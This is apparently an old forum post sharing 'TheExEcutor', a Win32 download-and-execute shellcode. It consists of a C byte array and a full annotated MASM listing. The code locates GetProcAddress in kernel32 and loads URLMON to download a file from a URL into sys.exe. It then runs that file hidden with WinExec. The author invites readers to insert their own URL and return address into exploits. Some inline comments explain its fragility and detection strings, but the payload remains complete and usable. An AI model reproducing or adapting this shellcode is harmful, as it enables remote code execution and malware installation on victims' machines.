This is the 1st version of my download & execute code... it searches the EXPORT table of KERNEL32 at a given KERNEL BASE. This code is the smallest I've seen in its class... less than 300 bytes Can be even smaller? yes... Can be more optimized? yes... That will be done in future releases. The Class B of this shellcode will search for the functions in the **IMPORT** table at a given base.... for example, inetinfo.exe base is 1000000h, by looking at the import table there, you will never fail executing the shellcode, you'll always get the correct addresses =).... Also compression & polymorphism will be implemented. I created an exploit that uses classB.... has never failed. (scary) Attached to this message: The ASM code and a VC++ file to test the shellcode............. Note: you have to change the C++ file... put another EIP. The one I'm using is at shell 32 (call esp or jmp esp)... I'm using W2k sp1. Also, change the scode and include the url you want. unsigned char TheExEcutor[293] = { 0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8, 0x03, 0x40, 0x3C, 0x8B, 0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D, 0x3C, 0x3B, 0x03, 0x1F, 0x33, 0xD2, 0x33, 0xC9, 0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50, 0x75, 0x0B, 0x81, 0x7B, 0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74, 0x02, 0xEB, 0xE5, 0x50, 0x41, 0x33, 0xC0, 0xB0, 0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03, 0xC1, 0x83, 0xC0, 0x24, 0xFF, 0x76, 0x02, 0x66, 0xFF, 0x30, 0x5B, 0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03, 0x80, 0x36, 0xFF, 0x81, 0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF, 0xEB, 0x02, 0xEB, 0x4B, 0x5E, 0x8B, 0xE5, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04, 0x56, 0x50, 0xFF, 0xD3, 0x83, 0xC6, 0x0D, 0x56, 0xFF, 0xD0, 0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x51, 0x83, 0xC6, 0x13, 0x56, 0x83, 0xC6, 0x1C, 0x56, 0x51, 0xFF, 0xD0, 0x58, 0x50, 0x83, 0xEE, 0x08, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 
0x56, 0xFF, 0xD0, 0x58, 0x83, 0xC6, 0x08, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0xFF, 0xD0, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x77, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0xFF, 0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x54, 0x6F, 0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF, 0x73, 0x79, 0x73, 0x2E, 0x65, 0x78, 0x65, 0xFF, 0x45, 0x78, 0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF, 0x57, 0x69, 0x6E, 0x45, 0x78, 0x65, 0x63, 0xFF, "http://box.net/baby.exe", 0xFF, 0x4B, 0x49, 0x4B, 0x45, } ; NOTE: SUBSTITUTE THE URL WITH THE ONE YOU WANT, i.e. "0x68, 0x74, 0x74, 0x70...." (HTTP...).... ; ; "TheExEcutor" Class A v1.0 - Win32 Shellcode ; ; Copyright (c) 2001 by Enrique A. Compañ Gzz. ; ; Virtek Labs ; ; http://www.virtekweb.net/labs ; ; ; Downloads & Executes a file. It searches for function addresses ; automatically by looking at the EXPORT table of Kernel32 with a ; default Kernel base of 78e80000h. You can change this. 
;
; --- Reviewer notes (analysis only; the instructions below are unchanged) ---
; What the listing does, as visible here: resolve GetProcAddress by walking
; the kernel32 export name table, decode the 0ffh-separated strings stored
; after pi_offset, then LoadLibraryA("URLMON") -> URLDownloadToFileA(url,
; "sys.exe") -> WinExec("sys.exe", 0) -> ExitProcess(0).
; Fragility: the kernel32 image base is a hard-coded constant read from
; vars_start (77e80000h after "xor ax, ax"); the header comment above says
; 78e80000h, which does not match those bytes.  Any OS build that maps
; kernel32 elsewhere makes every lookup below read unrelated memory.
; Detection notes: the API names, the "URLMON" module name, the URL, the
; "sys.exe" drop name and the "KIKE" end marker are all present in clear
; text (the 0ffh bytes are only NUL placeholders), and the decode loop
; writes to its own bytes, so the payload only works from writable memory.
; Note (review): the comments in this file are MASM ';' comments; the
; original wraps them onto the instruction lines, reformatted here.
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data
data db "blah"                          ;unused placeholder; the payload carries its own data after pi_offset

.code
shell_code_start:
        jmp fix_long_jmp                ;Jump to call back function (short jmp; see fix_long_jmp below)
call_back:
        pop esi                         ;ESI = first var offset (the return address pushed by "call call_back", i.e. vars_start)
real_code_start:
        mov ebp, esp                    ;Normalize the stack (restored into ESP later, which also discards the stray word left by the push/pop trick below)
        mov eax, [esi]                  ;eax = ptr to "MZ" (Kernel Base): the dword 77e8ffffh stored at vars_start
        xor ax, ax                      ;clear the low word -> 77e80000h; the 0ffh filler keeps the constant free of 00h bytes
        mov ebx, eax                    ;ebx = ptr to "MZ"
        add eax, [eax+3ch]              ;eax = ptr to "PE" (e_lfanew)
        mov eax, [eax+78h]              ;eax = export tables RVA (export directory entry of the optional header)
        add eax, ebx                    ;eax = ptr to export tables
        mov edi, [eax+20h]              ;edi = names tables RVA (AddressOfNames)
        lea edi, [edi+ebx]              ;edi = names table ptr
; Ex table = 77ed5c20
; Names tables with RVAs of names = 77ed6f92
        add ebx, [edi]                  ;ebx = base + RVA of the first name string; the scan below assumes the name strings are laid out back to back in table order
        xor edx, edx                    ;dl = 0, the terminator byte compared against
        xor ecx, ecx                    ;ecx = terminators passed so far = index of the name currently being read
search_function:
        inc ebx
        cmp [ebx], dl
        jne no_zero
        inc ecx                         ;crossed one more string boundary
no_zero:
        cmp [ebx], DWORD PTR 'PteG'     ;bytes "GetP"
        jne no_match
        cmp [ebx+4], DWORD PTR 'Acor'   ;bytes "rocA" -> "GetProcA..." (GetProcAddress)
        jne no_match
        je search_complete              ;always taken here (ZF was set by the cmp above); the jne/je pair is redundant
no_match:
        jmp search_function
search_complete:
        push eax                        ;save the export directory ptr
        inc ecx
        xor eax, eax
        mov al, 4
        mul ecx                         ;eax = 4 * (name index + 1)
        mov ecx, eax
        pop eax                         ;restore the export directory ptr
        add eax, ecx
        add eax, 024h                   ;eax = export dir + 28h + 4*index; not derived from AddressOfFunctions/AddressOfNameOrdinals, so this appears to rely on a dword table sitting right after the 28h-byte export directory in this kernel32 build -- layout assumption, confirm against the target image
        push [esi+2]                    ;pushes 0e8h,077h,"L","o"; its low word (77e8h) becomes the high word of EBX below
        push word ptr [eax]             ;low word of the table entry (leaves 2 extra bytes on the stack after the pop)
        pop ebx                         ;EBX = GetProcAddress address... finally!  Assembled as 77e8xxxxh: high word from the base constant, low word from the entry; only correct when the real address shares that high word
; Decode the NULL chars
        push esi                        ;keep vars_start for the second half
        add esi, 4                      ;skip the 4-byte base constant
decode_loop:
        inc esi
        cmp byte ptr [esi], 0ffh
        jne skip_xor
        xor byte ptr [esi], 0ffh        ;0ffh -> 00h in place: the payload bytes themselves are written, so they must be in writable memory
skip_xor:
        cmp [esi], dword ptr 'EKIK'     ;"KIKE" end marker
        jne decode_loop
;Trick to avoid Nulls in the first jmp instruction...
        jmp skip_fix_long_jmp           ;Skip the special jump
fix_long_jmp:
        jmp pi_offset                   ;Continue the jump to the call back function (two short jmps instead of one rel32 jmp whose displacement would contain 00h bytes)
skip_fix_long_jmp:
;Now we Download & Execute the file and terminate
        pop esi                         ;ESI = vars_start again
        mov esp, ebp                    ;Normalize ESP (drops whatever the push/pop word trick left behind)
        mov eax, [esi]                  ;eax = ptr to "MZ" (Kernel Base)
        xor ax, ax
        push eax                        ;keep the base on the stack across the calls; each "pop eax" below reads it back
        add esi, 4                      ;"LoadLibraryA"
        push esi
        push eax
        call ebx                        ;Call GetProcAddress (base, "LoadLibraryA")
        add esi, 13                     ;"URLMON"
        push esi
        call eax                        ;Call LoadLibraryA ("URLMON") -> eax = urlmon module handle
        add esi, 7                      ;"URLDownloadToFileA"
        push esi
        push eax
        call ebx                        ;Call GetProcAddress (urlmon, "URLDownloadToFileA")
        xor ecx, ecx
        push ecx                        ;lpfnCB = NULL
        push ecx                        ;dwReserved = 0
        add esi, 19                     ;"sys.exe"
        push esi                        ;szFileName (relative name; where it lands depends on the process's current directory)
        add esi, 28                     ;the URL (skips "sys.exe", "ExitProcess" and "WinExec")
        push esi                        ;szURL
        push ecx                        ;Call URLDownloadToFileA (pCaller = NULL)
        call eax                        ;the HRESULT in eax is never checked: WinExec runs whether or not the download succeeded
        pop eax                         ;kernel base (stdcall callee removed its 5 args)
        push eax
        sub esi, 8                      ;"WinExec"
        push esi
        push eax
        call ebx                        ;Call GetProcAddress (base, "WinExec")
        xor ecx, ecx
        push ecx                        ;uCmdShow = 0 (SW_HIDE: no visible window)
        sub esi, 20                     ;"sys.exe"
        push esi
        call eax                        ;Call WinExec ("sys.exe", 0)
        pop eax                         ;kernel base
        add esi, 8                      ;"ExitProcess"
        push esi
        push eax
        call ebx                        ;Call GetProcAddress (base, "ExitProcess")
        xor ecx, ecx
        push ecx                        ;uExitCode = 0
        call eax                        ;Call ExitProcess (does not return: the hijacked process dies here)
real_code_end:
pi_offset:
        call call_back                  ;Return and push the address of the vars (the rel32 is negative, so it contains no 00h bytes)
vars_start:
        db 0ffh,0ffh,0e8h,077h          ;Specify the Kernel Base @ 77e80000h (the file header above says 78e80000h; these bytes encode 77e80000h)
        db "LoadLibraryA",0ffh          ;every 0ffh below is turned into 00h by decode_loop at run time
        db "URLMON",0ffh
        db "URLDownloadToFileA",0ffh
        db "sys.exe",0ffh               ;file name the download is written to and then executed
        db "ExitProcess", 0ffh
        db "WinExec",0ffh
        db "http://box.net/baby.exe",0ffh ;The URL: Be sure to end it with 0ffh (the offsets "add esi, 28" / "sub esi, 8" above depend on the string order, not on the URL length)
        db "KIKE",0h                    ;Marker to know we reached the END (the only 00h byte in the data; decode_loop stops on it)
end shell_code_start
-------------- Wooh... that was long... See u....